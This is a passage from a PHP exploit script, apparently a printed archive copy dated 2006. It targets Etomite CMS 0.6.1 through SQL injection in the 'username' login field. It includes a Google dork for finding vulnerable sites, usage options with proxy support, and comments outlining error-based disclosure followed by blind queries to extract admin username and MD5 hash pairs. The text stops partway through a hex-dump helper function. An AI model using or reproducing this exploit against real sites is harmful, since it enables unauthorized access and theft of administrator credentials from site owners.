1 #!/usr/bin/php −q −d short_open_tag=on
2 <?
3 echo "Etomite CMS <= 0.6.1 (all patches applied) ’username’ SQL injection / admin credentials disclosure\r\n";
4 echo "by rgod rgod@autistici.org\r\n";
5 echo "site: http://retrogod.altervista.org\r\n";
6 echo "google dork: \"Content managed by the Etomite Content Management System\"\r\n\r\n";
7
8 /*
9 works with magic_quotes_gpc=Off
10 */
11
12 if ($argc<3) {
13 echo "Usage: php ".$argv[0]." host path OPTIONS\r\n";
14 echo "host: target server (ip/hostname)\r\n";
15 echo "path: path to etomite\r\n";
16 echo "Options:\r\n";
17 echo " −T[prefix]: specify a table prefix (default: etomite_)\r\n";
18 echo " −p[port]: specify a port other than 80\r\n";
19 echo " −P[ip:port]: specify a proxy\r\n";
20 echo "Examples:\r\n";
21 echo "php ".$argv[0]." localhost /etomite/ \r\n";
22 echo "php ".$argv[0]." localhost / −P1.1.1.1:80\r\n";
23 die;
24 }
25 /*
26 software site: http://www.etomite.org/
27
28 explaination:
29
30 goto http://[target]/[path_to_etomite]/manager/index.php
31
32 and, if magic_quotes_gpc=Off you have sql injection in ’username’ argument
33
34 you *could* bypass login check with a well crafted ’UNION SELECT’ but the
35 following ’REPLACE INTO’ query will fail.
36 Through the error message you can disclose database name and table prefix
37 that will be useful to go on with a new attack, asking true/false questions
38 to the database to dislose username/md5 hash pair...
39
40 */
41 error_reporting(0);
42 ini_set("max_execution_time",0);
43 ini_set("default_socket_timeout",5);
44
45 function quick_dump($string)
46 {
47 $result=’’;$exa=’’;$cont=0;
48 for ($i=0; $i<=strlen($string)−1; $i++)
49 {
50 if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
51 {$result.=" .";}
52 else
Page 1/6
Etomite CMS 0.6.1 username SQL Injection Exploit mq off
rgod
07/25/2006
53 {$result.=" ".$string[$i];}
54 if (strlen(dechex(ord($string[$i])))==2)
55 {$exa.=" ".dechex(ord($string[$i]));}
56 else
57 {$exa.=" 0".dechex(ord($s